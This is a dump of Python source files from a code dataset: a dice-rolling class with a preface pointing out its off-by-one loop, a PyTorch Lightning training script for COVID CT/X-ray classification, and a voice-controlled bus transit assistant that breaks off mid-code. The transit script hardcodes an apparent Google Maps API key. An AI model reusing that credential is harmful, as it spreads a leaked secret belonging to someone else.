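One detail worth flagging in the `Die` class taking shape here: the docstring promises ten rolls, but the `while count < 11` loop that follows (starting from `count = 0`) performs eleven. A corrected sketch of the method:

```python
from random import randint

class Die:
    """A die with a configurable number of sides."""
    def __init__(self, sides=6):
        self.sides = sides

    def roll_die(self):
        """Roll the die exactly 10 times, printing each result."""
        for _ in range(10):  # range(10) gives the ten rolls the docstring promises
            print(randint(1, self.sides))

Die(20).roll_die()
```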
count = 0\n while count < 11:\n num = randint(1,self.sides)\n print(str(num))\n count += 1\n \n def set_sides(self,num_sides):\n \"\"\"User can change number of sides on die.\"\"\"\n self.sides = num_sides\n \ndie = Die()\n\ndie.roll_die()\nprint(\"\\n\")\ndie.sides = 20\ndie.roll_die()\n","sub_path":"random_methods.py","file_name":"random_methods.py","file_ext":"py","file_size_in_byte":1294,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"446040052","text":"\nimport pytorch_lightning as pl\nfrom torch.optim import Adam\nfrom pytorch_lightning import Trainer\nfrom argparse import ArgumentParser\nimport torch\nimport torchvision.transforms as transforms\nimport torch.nn as nn\nfrom torch.utils.data import Dataset, DataLoader\nfrom torch.optim.lr_scheduler import StepLR,CosineAnnealingLR\nimport torchvision.models as models\nimport json\nfrom pytorch_lightning.callbacks import EarlyStopping, ModelCheckpoint, LearningRateLogger\nfrom sklearn.metrics import confusion_matrix,f1_score\nimport os\nos.chdir(os.path.dirname(__file__)) # set current .py file as working directory\nimport sys\n\nsys.path.insert(0,\"../..\")\n# customized packages\nfrom src.lib.dataset import *\nfrom src.lib.helper_func import *\n\n#CAN\nfrom src.model import model\nfrom src.config.config import cfg, cfg_from_file, cfg_from_list\nfrom src.discrepancy.cdd import CDD\nimport random\nfrom src.utils.utils import to_cuda, to_onehot\n\n\nclass Mixed_COVID_CT_Xray_Sys(pl.LightningModule):\n\n def __init__(self, hparams):\n super().__init__()\n\n # do this to save all arguments in any logger (tensorboard)\n self.hparams = hparams\n\n with open(hparams.dataset_info) as fp:\n self.dataset_info_table = json.load(fp)\n self.dataset_info = self.dataset_info_table[hparams.dataset_name]\n\n # split train and val\n # self.data_split,self.dataset_label = self.split_train_val()\n\n # CAN\n # initialize model\n model_state_dict = None\n fx_pretrained = True\n resume_dict = None\n\n\n\n num_domains_bn = 2\n net = model.danet(num_classes=self.hparams.num_class,\n state_dict=model_state_dict,\n feature_extractor=cfg.MODEL.FEATURE_EXTRACTOR,\n frozen=[cfg.TRAIN.STOP_GRAD],\n fx_pretrained=fx_pretrained,\n dropout_ratio=cfg.TRAIN.DROPOUT_RATIO,\n fc_hidden_dims=cfg.MODEL.FC_HIDDEN_DIMS,\n num_domains_bn=num_domains_bn)\n\n self.model = net\n # num_ftrs = self.model.classifier.in_features\n # self.model.classifier = nn.Linear(num_ftrs, hparams.num_class)\n # self.init_weights(self.model.classifier)\n self.opt = cfg\n\n self.discrepancy_key = 'intra' if self.opt.CDD.INTRA_ONLY else 'cdd'\n num_layers = len(self.model.FC) + 1\n print(\"Num_layers: \", num_layers)\n self.cdd = CDD(kernel_num=self.opt.CDD.KERNEL_NUM, kernel_mul=self.opt.CDD.KERNEL_MUL,\n num_layers=num_layers, num_classes=self.hparams.num_class,\n intra_only=self.opt.CDD.INTRA_ONLY)\n\n # transforms\n self.train_transformer = transforms.Compose([\n transforms.Resize(256),\n transforms.RandomResizedCrop((224), scale=(0.5, 1.0)),\n # transforms.Resize((224, 224)),\n transforms.RandomHorizontalFlip(),\n # transforms.RandomRotation(90),\n transforms.RandomAffine(degrees=15, translate=(0.1, 0.1), shear=(-5, 5, -5, 5)),\n # random brightness and random contrast\n transforms.ColorJitter(brightness=0.2, contrast=0.2),\n transforms.ToTensor(),\n transforms.Normalize(mean=[0.45271412, 0.45271412, 0.45271412],\n std=[0.33165374, 0.33165374, 0.33165374])\n ])\n\n self.all_x = self.classAwareLoad()\n\n # self.model = 
models.densenet169(pretrained=True)\n # num_ftrs = self.model.classifier.in_features\n # self.model.classifier = nn.Linear(num_ftrs, hparams.num_class)\n # self.init_weights(self.model.classifier)\n # self.model.load_state_dict(torch.load(hparams.pretrained_path))\n\n # def split_train_val(self):\n # import sklearn.model_selection\n #\n #\n # CTnoncovid_img_list = [os.path.join(self.dataset_info[\"CTnoncovid\"], p) for p in\n # os.listdir(self.dataset_info[\"CTnoncovid\"])]\n # CTcovid_img_list = [os.path.join(self.dataset_info[\"CTcovid\"], p) for p in\n # os.listdir(self.dataset_info[\"CTcovid\"])]\n # CTlabel = [0] * len(CTnoncovid_img_list) + [1] * len(CTcovid_img_list)\n # CTsplit = sklearn.model_selection.train_test_split(CTnoncovid_img_list + CTcovid_img_list , CTlabel,\n # test_size=0.3, random_state=66)\n #\n # Xraynoncovid_img_list = [os.path.join(self.dataset_info[\"Xraynoncovid\"], p) for p in\n # os.listdir(self.dataset_info[\"Xraynoncovid\"])]\n # Xraycovid_img_list = [os.path.join(self.dataset_info[\"Xraycovid\"], p) for p in\n # os.listdir(self.dataset_info[\"Xraycovid\"])]\n # Xraylabel = [0] * len(Xraynoncovid_img_list) + [1] * len(Xraycovid_img_list)\n # Xraysplit = sklearn.model_selection.train_test_split(Xraynoncovid_img_list + Xraycovid_img_list, Xraylabel,\n # test_size=0.3, random_state=66)\n # # \"0\":CT dataset; \"1\":Xray dataset\n # ds_train_label = [0] * len(CTsplit[0]) + [1] * len(Xraysplit[0])\n # ds_val_label = [0] * len(CTsplit[1]) + [1] * len(Xraysplit[1])\n # dataset_label = {\"train\":ds_train_label,\"val\":ds_val_label }\n # data_split = []\n # for ct,xray in zip(CTsplit,Xraysplit):\n # data_split.append(ct+xray)\n #\n # return data_split,dataset_label\n\n def init_weights(self, m):\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n nn.init.kaiming_normal_(m.weight)\n elif isinstance(m, nn.BatchNorm2d):\n nn.init.constant_(m.weight, 1)\n nn.init.constant_(m.bias, 0)\n elif isinstance(m, nn.Linear):\n nn.init.constant_(m.bias, 0)\n\n def train_dataloader(self):\n # data\n trainset = MixedDataset(self.dataset_info,train=True, transform=self.train_transformer)\n dataloader = DataLoader(trainset, batch_size=self.hparams.batch_size, drop_last=False, shuffle=True,\n num_workers=6)\n return dataloader\n\n def val_dataloader(self):\n # print(\"Val_loader\")\n val_transformer = transforms.Compose([\n transforms.Resize((224, 224)),\n transforms.ToTensor(),\n transforms.Normalize(mean=[0.45271412, 0.45271412, 0.45271412],\n std=[0.33165374, 0.33165374, 0.33165374])\n ])\n valset = MixedDataset(self.dataset_info, train=False, transform=val_transformer)\n return DataLoader(valset, batch_size=self.hparams.batch_size, drop_last=False, shuffle=False, num_workers=6)\n\n def forward(self, x):\n x = self.model(x)\n return x\n\n def configure_optimizers(self):\n optimizer = Adam(self.parameters(), lr=self.hparams.learning_rate)\n scheduler = StepLR(optimizer, step_size=9999999999999)\n # scheduler = CosineAnnealingLR(optimizer, self.trainer.max_epochs, self.hparams.cos_lr_min)\n return {\"optimizer\": optimizer, \"lr_scheduler\": scheduler}\n\n def prepare_feats(self, feats):\n return [feats[key] for key in feats if key in self.opt.CDD.ALIGNMENT_FEAT_KEYS]\n\n def CAS(self):\n sample_num = int(self.hparams.batch_size/2)\n source_samples_0 = random.sample(self.all_x['source_x']['class0'], sample_num)\n source_samples_1 = random.sample(self.all_x['source_x']['class1'], sample_num)\n target_samples_0 = random.sample(self.all_x['target_x']['class0'], sample_num)\n 
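The `CAS` helper being assembled here draws an equal number of cached tensors per class from the source and target pools; the balancing logic is easy to test on plain lists. A domain-free sketch (see also the weighted variant, `CAS_byWeight`, just below):

```python
import random

# Balanced class-aware sampling: k items per class from one domain.
def class_aware_sample(domain, k, rng=random):
    """domain: dict class_name -> list of items; returns (samples, counts)."""
    samples, counts = [], []
    for cls in sorted(domain):
        samples.extend(rng.sample(domain[cls], k))
        counts.append(k)
    return samples, counts

source = {"class0": list(range(10)), "class1": list(range(10, 20))}
samples, counts = class_aware_sample(source, 3)
print(len(samples), counts)  # 6 [3, 3]
```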
target_samples_1 = random.sample(self.all_x['target_x']['class1'], sample_num)\n        source_samples = source_samples_0 + source_samples_1\n        target_samples = target_samples_0 + target_samples_1\n\n        source_nums = [sample_num, sample_num]\n        target_nums = [sample_num, sample_num]\n\n        return source_samples, source_nums, target_samples, target_nums\n\n\n    def CAS_byWeight(self):\n        total = len(self.all_x['source_x']['class0']) + len(self.all_x['source_x']['class1']) \\\n            + len(self.all_x['target_x']['class0']) + len(self.all_x['target_x']['class1'])\n        total_num = 2*self.hparams.batch_size\n        source_num_0 = int(total_num * len(self.all_x['source_x']['class0'])/total)\n        source_num_1 = int(total_num * len(self.all_x['source_x']['class1'])/total)\n        target_num_0 = int(total_num * len(self.all_x['target_x']['class0'])/total)\n        target_num_1 = int(total_num * len(self.all_x['target_x']['class1'])/total)\n\n        source_samples_0 = random.sample(self.all_x['source_x']['class0'], source_num_0)\n        source_samples_1 = random.sample(self.all_x['source_x']['class1'], source_num_1)\n        target_samples_0 = random.sample(self.all_x['target_x']['class0'], target_num_0)\n        target_samples_1 = random.sample(self.all_x['target_x']['class1'], target_num_1)\n        source_samples = source_samples_0 + source_samples_1\n        target_samples = target_samples_0 + target_samples_1\n\n        source_nums = [source_num_0, source_num_1]\n        target_nums = [target_num_0, target_num_1]\n\n        return source_samples, source_nums, target_samples, target_nums\n\n\n    def training_step(self, batch, batch_idx):\n        # conventional cross-entropy on the mixed batch\n        data, label, ds_label = batch\n        output = self(data)['logits']\n        criterion = nn.CrossEntropyLoss()\n        ce_loss = criterion(output, label.long())\n\n        # cdd\n        # 1) class-aware sampling\n        if self.hparams.weighted_CAS:\n            source_samples_cls, source_nums_cls, \\\n            target_samples_cls, target_nums_cls = self.CAS_byWeight()\n        else:\n            source_samples_cls, source_nums_cls, \\\n            target_samples_cls, target_nums_cls = self.CAS()\n\n        # 2) forward and compute the loss\n        source_cls_concat = torch.cat([to_cuda(samples)\n                                       for samples in source_samples_cls], dim=0)\n        target_cls_concat = torch.cat([to_cuda(samples)\n                                       for samples in target_samples_cls], dim=0)\n\n        feats_source = self.model(source_cls_concat)\n        feats_target = self.model(target_cls_concat)\n\n        # prepare the features\n        feats_toalign_S = self.prepare_feats(feats_source)\n        feats_toalign_T = self.prepare_feats(feats_target)\n\n        cdd_loss = self.cdd.forward(feats_toalign_S, feats_toalign_T,\n                                    source_nums_cls, target_nums_cls)[self.discrepancy_key]\n\n        cdd_loss *= self.opt.CDD.LOSS_WEIGHT\n        loss = ce_loss + cdd_loss\n        # add logging\n        logs = {'loss': loss, 'ce_loss': ce_loss, 'cdd_loss': cdd_loss}\n        return {'loss': loss, 'ce_loss': ce_loss, 'cdd_loss': cdd_loss, 'log': logs}\n\n    def validation_step(self, batch, batch_idx):\n        x, y, ds_label = batch\n        logits = self(x)[\"logits\"]\n        criterion = nn.CrossEntropyLoss()\n        loss = criterion(logits, y)\n        # compute predictions for the confusion matrix on this batch\n        pred = logits.argmax(dim=1).view_as(y)\n        return {'val_loss': loss, \"pred\": pred, \"label\": y, \"ds_label\": ds_label}\n\n    def validation_epoch_end(self, outputs):\n        avg_loss = torch.stack([x['val_loss'] for x in outputs]).mean()\n        pred_total = torch.cat([x['pred'] for x in outputs]).view(-1)\n        y_total = torch.cat([x['label'] for x in outputs]).view(-1)\n        ds_label = torch.cat([x['ds_label'] for x in outputs]).view(-1)\n\n        val_acc = torch.mean((pred_total.cpu() == y_total.cpu()).type(torch.float))\n        F1_score = 
torch.tensor(f1_score(y_total.cpu(),pred_total.cpu(),average=\"micro\"))\n\n ct_ind = torch.where(ds_label==0)\n CT_F1_score = torch.tensor(f1_score(y_total[ct_ind].cpu(),pred_total[ct_ind].cpu(),average=\"micro\"))\n ct_Confusion_matrix = confusion_matrix(y_total[ct_ind].cpu(), pred_total[ct_ind].cpu())\n\n xray_ind = torch.where(ds_label==1)\n Xray_F1_score = torch.tensor(f1_score(y_total[xray_ind].cpu(),pred_total[xray_ind].cpu(),average=\"micro\"))\n xray_Confusion_matrix = confusion_matrix(y_total[xray_ind].cpu(), pred_total[xray_ind].cpu())\n\n\n print(\"val_loss = \", avg_loss.cpu())\n print(\"CT_F1_score=\",CT_F1_score)\n print(\"Xray_F1_score = \",Xray_F1_score)\n print(\"ct_Confusion_matrix = \\n\",ct_Confusion_matrix)\n print(\"xray_Confusion_matrix = \\n\",xray_Confusion_matrix)\n logs = {\"F1_score\":F1_score,\"val_acc\": val_acc,\"val_loss\":avg_loss,\n \"CT_F1_score\":CT_F1_score, \"Xray_F1_score\":Xray_F1_score}\n return {'log': logs}\n\n def test_step(self, batch, batch_idx):\n x, y = batch\n logits = self(x)\n criterion = nn.CrossEntropyLoss()\n loss = criterion(logits, y)\n # compute confucsion matrix on this batch\n pred = logits.argmax(dim=1).view_as(y)\n return {'test_loss': loss, \"pred\": pred, \"label\": y}\n\n def test_epoch_end(self, outputs):\n avg_loss = torch.stack([x['test_loss'] for x in outputs]).mean()\n\n pred_total = torch.cat([x['pred'] for x in outputs]).view(-1)\n y_total = torch.cat([x['label'] for x in outputs]).view(-1)\n F1_score = f1_score(y_total.cpu(), pred_total.cpu(), average=\"binary\")\n tensorboard_logs = {'test_loss': avg_loss, \"F1_score\": F1_score}\n return {'test_loss': avg_loss, 'log': tensorboard_logs}\n\n def on_epoch_start(self):\n if self.hparams.freeze_epochs > 0:\n if self.current_epoch == self.hparams.freeze_epochs:\n self.unfreeze_for_transfer()\n\n def on_epoch_end(self):\n if self.hparams.log_histogram:\n self.log_histogram()\n\n def on_train_start(self):\n if self.hparams.freeze_epochs > 0:\n self.freeze_for_transfer()\n\n \"\"\"=============================self-defined function=============================\"\"\"\n\n def log_histogram(self):\n print(\"\\nlog hist of weights\")\n\n enc_dict = self.model.feature_extractor.state_dict()\n for name, val in enc_dict.items():\n self.logger.experiment.add_histogram(\"features/\" + name, val, self.current_epoch)\n\n cls_dict = self.model.classifier.state_dict()\n for name, val in cls_dict.items():\n self.logger.experiment.add_histogram(\"classifier/\" + name, val, self.current_epoch)\n\n def freeze_for_transfer(self):\n print(\"Freeze encoder for {} epochs\".format(self.hparams.freeze_epochs))\n for param in self.model.feature_extractor.parameters():\n param.requires_grad = False\n\n def unfreeze_for_transfer(self):\n print(\"\\n UnFreeze encoder at {}-th epoch\".format(self.hparams.freeze_epochs))\n for param in self.model.feature_extractor.parameters():\n param.requires_grad = True\n\n @staticmethod\n def add_model_specific_args(parent_parser):\n parser = ArgumentParser(parents=[parent_parser], add_help=False)\n\n return parser\n\n\n def classAwareLoad(self):\n xray = self.dataset_info_table[self.hparams.dataset_xray]\n ct = self.dataset_info_table[self.hparams.dataset_ct]\n # xray dataloader\n trainset_xray = CovidXray2clsDataset(xray, train=True, transform=self.train_transformer)\n dataloader_xray = DataLoader(trainset_xray, drop_last=False, shuffle=True,\n num_workers=4)\n\n # CT dataloader\n trainset_ct = CovidCTDataset(root_dir=ct[\"image_folder\"],\n 
txt_COVID=ct[\"data_split\"] + '/COVID/trainCT_COVID.txt',\n txt_NonCOVID=ct[\"data_split\"] + '/NonCOVID/trainCT_NonCOVID.txt',\n transform=self.train_transformer)\n dataloader_ct = DataLoader(trainset_ct, drop_last=False, shuffle=True,\n num_workers=4)\n\n source_x_class0 = []\n source_x_class1 = []\n target_x_class0 = []\n target_x_class1 = []\n for x, y in dataloader_xray:\n if y == 0:\n source_x_class0.append(x)\n else:\n source_x_class1.append(x)\n\n for x, y in dataloader_ct:\n if y == 0:\n target_x_class0.append(x)\n else:\n target_x_class1.append(x)\n\n source_x = {'class0': source_x_class0, 'class1': source_x_class1}\n target_x = {'class0': target_x_class0, 'class1': target_x_class1}\n return {'source_x': source_x, 'target_x': target_x}\n\n\ndef main(args):\n # pick model according to args\n if args.early_stop_callback:\n early_stop_callback = EarlyStopping(\n monitor='val_loss',\n patience=30,\n strict=True,\n verbose=False,\n mode='min'\n )\n else:\n early_stop_callback = False\n\n checkpoint_callback = ModelCheckpoint(\n filepath=None,\n monitor='F1_score',\n save_top_k=1,\n mode='max'\n )\n\n lr_logger = LearningRateLogger()\n\n if args.test:\n pretrained_model = Mixed_COVID_CT_Xray_Sys.load_from_checkpoint(args.model_path)\n trainer = Trainer(gpus=args.gpus)\n trainer.test(pretrained_model)\n return 0\n # pretrained_model.freeze()\n # y_hat = pretrained_model(x)\n\n Sys = Mixed_COVID_CT_Xray_Sys(hparams=args)\n trainer = Trainer(early_stop_callback=early_stop_callback,\n checkpoint_callback=checkpoint_callback,\n callbacks=[lr_logger],\n gpus=args.gpus,\n default_root_dir = '../../results/logs/{}'.format(os.path.basename(__file__)[:-3]),\n max_epochs=args.max_epochs)\n\n trainer.fit(Sys)\n\n\n\nif __name__ == '__main__':\n parser = ArgumentParser()\n # parser = Trainer.add_argparse_args(parser)\n\n # figure out which model to use\n parser.add_argument('--dataset_name', type=str, default='Mixed_COVID_CT_Xray', help='')\n parser.add_argument('--dataset_xray', type=str, default='COVID-Xray2cls', help='')\n parser.add_argument('--dataset_ct', type=str, default='COVID-CT', help='')\n parser.add_argument('--dataset_info', type=str, default='dataset_info.json', help='path to datainfo .json file')\n # parser.add_argument('--pretrained_path', type=str, default='DenseNet169/Self-Trans/Self-Trans.pt', help='path to pretrained model')\n\n parser.add_argument('--early_stop_callback', type=bool, default=False, help='')\n parser.add_argument('--gpus', type=int, default=1, help='')\n parser.add_argument('--test', type=bool, default=False, help='')\n parser.add_argument('--model_path', type=str, default=\"\", help='the well-trained model path for testing')\n parser.add_argument('--freeze_epochs', type=int, default=30)\n parser.add_argument('--batch_size', type=int, default=16)\n parser.add_argument('--learning_rate', type=float, default=0.0005)\n parser.add_argument('--cos_lr_min', type=float, default=5e-7)\n parser.add_argument('--max_epochs', type=int, default=300)\n parser.add_argument('--loss_w1', type=float, default=0.45,\n help='CrossEntropy loss weight for COVID type (Majority)')\n parser.add_argument('--num_class', type=int, default=2)\n parser.add_argument('--weighted_CAS', type=bool, default=False, help='')\n # Debug Info\n parser.add_argument('--log_histogram', type=bool, default=False, help='')\n parser.add_argument('--note', type=str, default=\"\", help='')\n # THIS LINE IS KEY TO PULL THE MODEL NAME\n temp_args = parser.parse_known_args()\n\n # let the model add what it 
wants\n\n parser = Mixed_COVID_CT_Xray_Sys.add_model_specific_args(parser)\n\n args = parser.parse_args()\n\n # train\n main(args)\n","sub_path":"src/scripts/CAN_COVID_CT_Xray_train.py","file_name":"CAN_COVID_CT_Xray_train.py","file_ext":"py","file_size_in_byte":19883,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"129028081","text":"import random\nimport time\nimport speech_recognition as sr\nimport urllib.request, json\nimport re\nimport datetime\nimport urllib.request\nimport json\nPROMPT_LIMIT = 3\n\n\ndef speech_from_txt(s):\n # [START tts_quickstart]\n \"\"\"Synthesizes speech from the input string of text or ssml.\n Note: ssml must be well-formed according to:\n https://www.w3.org/TR/speech-synthesis/\n \"\"\"\n from gtts import gTTS\n tts = gTTS(s)\n tts.save(\"va.mp3\")\n\n try:\n \n from playsound import playsound\n playsound('va.mp3')\n\n except:\n pass\n \"\"\"from pygame import mixer\n #__init__()\n music.load(\"va.mp3\")\n music.play() \"\"\" \n \n\ndef recognize_speech_from_mic(recognizer, microphone):\n \"\"\"Transcribe speech from recorded from `microphone`.\n\n Returns a dictionary with three keys:\n \"success\": a boolean indicating whether or not the API request was\n successful\n \"error\": `None` if no error occured, otherwise a string containing\n an error message if the API could not be reached or\n speech was unrecognizable\n \"transcription\": `None` if speech could not be transcribed,\n otherwise a string containing the transcribed text\n \"\"\"\n # check that recognizer and microphone arguments are appropriate type\n if not isinstance(recognizer, sr.Recognizer):\n raise TypeError(\"`recognizer` must be `Recognizer` instance\")\n\n if not isinstance(microphone, sr.Microphone):\n raise TypeError(\"`microphone` must be `Microphone` instance\")\n\n # adjust the recognizer sensitivity to ambient noise and record audio\n # from the microphone\n with microphone as source:\n recognizer.adjust_for_ambient_noise(source)\n audio = recognizer.listen(source)\n\n # set up the response object\n response = {\n \"success\": True,\n \"error\": None,\n \"transcription\": None\n }\n\n # try recognizing the speech in the recording\n # if a RequestError or UnknownValueError exception is caught,\n # update the response object accordingly\n try:\n response[\"transcription\"] = recognizer.recognize_google(audio)\n except sr.RequestError:\n # API was unreachable or unresponsive\n response[\"success\"] = False\n response[\"error\"] = \"API unavailable\"\n except sr.UnknownValueError:\n # speech was unintelligible\n response[\"error\"] = \"Unable to recognize speech\"\n\n return response\n\ndef prompt_user():\n # set the list of words, maxnumber of guesses, and prompt limit\n #WORDS = [\"apple\", \"banana\", \"grape\", \"orange\", \"mango\", \"lemon\"]\n #NUM_GUESSES = 3\n PROMPT_LIMIT = 3\n\n # create recognizer and mic instances\n recognizer = sr.Recognizer()\n microphone = sr.Microphone()\n\n # get a random word from the list\n #word = random.choice(WORDS)\n\n # format the instructions string\n instructions = (\n \"Speak when asked to.\\n\"\n )\n\n\n #speech_from_txt(\"Speak when asked to\")\n \n # show instructions and wait 3 seconds before starting the game\n print(instructions)\n time.sleep(1)\n for j in range(PROMPT_LIMIT):\n time.sleep(1)\n print('Speak!\\n')\n text = recognize_speech_from_mic(recognizer, microphone)\n if not text[\"success\"]:\n print(\"error with API call\")\n break\n if text[\"transcription\"]:\n 
print(\"You said: {}. Is this correct?\\n\".format(text[\"transcription\"]))\n            time.sleep(0.2)\n            for k in range(PROMPT_LIMIT):\n                #print(\"Speak again\\n\")\n                text_2=recognize_speech_from_mic(recognizer, microphone)\n                if text_2[\"transcription\"]==\"yes\":\n                    print(\"Understood\\n\")\n                    time.sleep(2)\n                    return text[\"transcription\"].lower()\n                if text_2[\"transcription\"]==\"no\":\n                    print(\"Sorry about that, could you please repeat that for me\\n\")\n                    time.sleep(0.3)\n                    break\n                else:\n                    print(\"I didn't catch your answer. What did you say?\\n\")\n                    time.sleep(0.3)\n                    break\n\n    # if there was an error, stop the game\n    if text[\"error\"]:\n        print(\"ERROR: {}\".format(text[\"error\"]))\n    \n    \ndef google_api1(destination):\n    print(\"CHECKING IF DESTINATION IS VALID\")\n    time.sleep(5)\n    endpoint='https://maps.googleapis.com/maps/api/directions/json?'\n    api_key='AIzaSyCQAs4T3bVLI2RRJQN3bwsj4ZkSiQHMQUs'\n    origin='Yonge+and+Finch+Toronto+Ontario'\n    destination=destination.replace(\" \",'+')\n    mode='transit'\n    transit_mode='bus'\n    #transit_routing_preference=['less_walking','fewer_transfers']\n    #preference_input=input('To select a route that involves less walking press or say 1, for a route that involves fewer bus transfers, press or say 2: ')\n    #if (preference_input=='1'):\n    navigation_req='origin={}&destination={}&mode={}&transit_mode={}&key={}'.format(origin, destination,mode,transit_mode,api_key)\n    #else:\n    #navigation_req='origin={}&destination={}&mode={}&transit_mode={}&transit_routing_preference={}&key={}'.format(origin, destination,mode,transit_mode,transit_routing_preference[1],api_key)\n    google_request=endpoint + navigation_req\n    response=urllib.request.urlopen(google_request).read()\n    directions=json.loads(response) \n    routes=directions['routes']\n    #print(routes)\n    if (routes==[]):\n        #return False\n        routes_available= False\n        print(\"NO AVAILABLE ROUTES FOUND. 
DESTINATION DOES NOT EXIST\")\n        time.sleep(2)\n        #print(\"We couldn't find routes to the destination specified or the destination entered was invalid\")\n    else:\n        #return True\n        print(\"DESTINATION FOUND\")\n        time.sleep(2)\n        routes_available= True\n    return routes_available\n\ndef google_api2(destination,preference_input):\n    print(\"CALCULATING DIRECTIONS TO THE CHOSEN DESTINATION\\n\")\n    time.sleep(5)\n    endpoint='https://maps.googleapis.com/maps/api/directions/json?'\n    api_key='AIzaSyCQAs4T3bVLI2RRJQN3bwsj4ZkSiQHMQUs'\n    origin='Yonge+and+Finch+Toronto+Ontario'\n    destination=destination.replace(\" \",'+')\n    mode='transit'\n    transit_mode='bus'\n    #transit_routing_preference=['less_walking','fewer_transfers']\n    \n    #preference_input=input('To select a route that involves less walking press or say 1, for a route that involves fewer bus transfers, press or say 2: ')\n    navigation_req='origin={}&destination={}&mode={}&transit_mode={}&transit_routing_preference={}&key={}'.format(origin, destination,mode,transit_mode,preference_input,api_key)\n    \n    \n    google_request=endpoint + navigation_req \n    response=urllib.request.urlopen(google_request).read()\n    directions=json.loads(response)\n    \n    routes=directions['routes']\n    route_available= google_api1(destination)\n    if route_available==True:\n        trip_details={}\n        possible_routes=routes[0]['legs']\n        distance1=possible_routes[0]['steps'][1]['distance']['text']\n        bus_num=possible_routes[0]['steps'][1]['transit_details']['line']['short_name']\n        departure_stop1=possible_routes[0]['steps'][1]['transit_details']['departure_stop']['name']\n        departure_time1=possible_routes[0]['steps'][1]['transit_details']['departure_time']['text']\n        arrival_stop1=possible_routes[0]['steps'][1]['transit_details']['arrival_stop']['name']\n        arrival_time1=possible_routes[0]['steps'][1]['transit_details']['arrival_time']['text']\n        trip_details={'bus_num':bus_num,'Distance':distance1,\n                      'Departure_stop':departure_stop1,\n                      'Departure_time':departure_time1,\n                      'arrival_stop':arrival_stop1,'arrival_time':arrival_time1}\n        print(\"ITINERARY ACQUIRED\")\n        time.sleep(3)\n    return trip_details\n\ndef get_time(raw_time):\n    print(\"CALCULATING REMAINING TIME LEFT TILL BUS ARRIVAL\")\n    time.sleep(3)\n    current = datetime.datetime.now()\n    hour_now = current.hour\n    minute_now = current.minute\n\n    bus_hour = int(raw_time[:-4])\n    # convert to 24-hour time; noon ('12:..p') is already hour 12\n    if raw_time[-1] == 'p' and bus_hour != 12:\n        bus_hour += 12 \n    \n\n    bus_min = int(raw_time[-3:-1])\n\n    bus_min_t = bus_min + 60*bus_hour\n    min_t = minute_now + 60*hour_now\n\n    print(bus_min_t)\n    print(min_t)\n    minutes = bus_min_t - min_t\n\n    # split the remaining minutes into whole hours and leftover minutes\n    h = minutes // 60\n    m = minutes % 60\n\n    print(h)\n    print(m)\n\n    \n    m=str(m)\n    h=str(h)\n    print(\"TIME CALCULATED\")\n    \n    time.sleep(2)\n    return [h,m]\n\ndef get_raw_schedule():\n    endpoint = 'https://myttc.ca/finch_station.json'\n    response = urllib.request.urlopen(endpoint).read()\n    raw_schedule = json.loads(response)\n    print(\"GETTING RAW SCHEDULE\")\n    time.sleep(2)\n    return raw_schedule\n\ndef create_schedule(raw_schedule):\n    bus_timing = {}\n    ls = raw_schedule['stops'][1]['routes']\n    print(\"BUILDING SCHEDULE\")\n    time.sleep(2)\n    for row in ls:\n        for col in row[\"stop_times\"]:\n            bus_name = col[\"shape\"]\n            if bus_name in bus_timing.keys():\n                break\n            else:\n                bus_timing[bus_name] = col[\"departure_time\"]\n            #print(\"bus: {} is departing at {}\".format(bus_name,bus_timing[bus_name]))\n    print(\"BUS SCHEDULE GENERATED\")\n    time.sleep(2)\n    return bus_timing\n\ndef get_certain_bus_time(bus_num,schedule):\n    print(\"CHECKING TIMING FOR BUS\")\n    time.sleep(2)\n    for key 
in schedule.keys():\n        if bus_num in key:\n            print(\"BUS FOUND\")\n            time.sleep(2)\n            raw_time = schedule[key]\n            return raw_time\n        print(\"SEARCHING\")\n        time.sleep(1)\n    print(\"BUS NOT FOUND\")\n    time.sleep(3)\n    return \"DNE\"\n\nif __name__ == \"__main__\":\n    EXIT=\"exit\"\n    while(1):\n        print(\"BEGINNING OF THE WHILE LOOP\")\n        time.sleep(2)\n        print(\"Hello. Say option one to find the next arrival of a bus, option 2 to find transit directions to a place, or exit to start over\")\n        time.sleep(4)\n        for a in range(PROMPT_LIMIT):\n            command=prompt_user()\n            if command==\"option 1\":\n                print(\"Great. Which bus would you like to find?\\n\")\n                for b in range(PROMPT_LIMIT):\n                    command=prompt_user()\n                    if command==EXIT:\n                        print(\"Exiting\")\n                        time.sleep(1)\n                        break\n                    else:\n                        bus_num=command\n                        print(\"Great!\")\n                        time.sleep(1)\n                        print(\"CHECKING IF BUS EXISTS\")\n                        time.sleep(4)\n                        raw_schedule=get_raw_schedule()\n                        schedule=create_schedule(raw_schedule)\n                        bus_num = bus_num.upper()\n                        print(\"busNUM {}\".format(bus_num))\n                        bus_time=get_certain_bus_time(bus_num,schedule)\n                        if bus_time!=\"DNE\":\n                            print(\"GETTING ETA\")\n                            time.sleep(3)\n                            l = get_time(bus_time)\n                            hours=l[0]\n                            minutes=l[1]\n                            # get_time returns the hour count as a string, so compare against \"0\"\n                            if hours != \"0\":\n                                message=bus_num+\" will arrive in \"+hours+\" hours and \"+minutes+\" minutes\"\n                            else:\n                                message=bus_num+\" will arrive in \"+minutes+\" minutes\"\n                            print(message)\n                            time.sleep(7)\n                            break\n                        else:\n                            print(\"I'm sorry, I couldn't find when that bus will arrive. Please state a bus that arrives at this bus station or say exit to start over\")\n                            time.sleep(5)\n            if command==\"option 2\":\n                print(\"Great. Please state your destination address or say exit to start over\")\n                for c in range(PROMPT_LIMIT):\n                    command=prompt_user()\n                    if command!=EXIT:\n                        destination=command\n                        destination_exists=google_api1(destination)\n                        if destination_exists==True:\n                            print(\"Great. Would you prefer a route with fewer transfers or less walking?\")\n                            time.sleep(3)\n                            for d in range(PROMPT_LIMIT):\n                                command=prompt_user()\n                                if command==\"fewer transfers\":\n                                    option=\"fewer_transfers\"\n                                    itinerary=google_api2(destination,option)\n                                    arrival_stop=itinerary[\"arrival_stop\"]\n                                    departure_time=itinerary['Departure_time']\n                                    arrival_time=itinerary[\"arrival_time\"]\n                                    bus_num=itinerary[\"bus_num\"]\n                                    print(\"Take \"+bus_num+\" to \"+arrival_stop+\" at \"+departure_time+\". Your estimated time of arrival is \"+arrival_time)\n                                    break\n                                if command==\"less walking\":\n                                    option=\"less_walking\"\n                                    itinerary=google_api2(destination,option)\n                                    arrival_stop=itinerary[\"arrival_stop\"]\n                                    departure_time=itinerary['Departure_time']\n                                 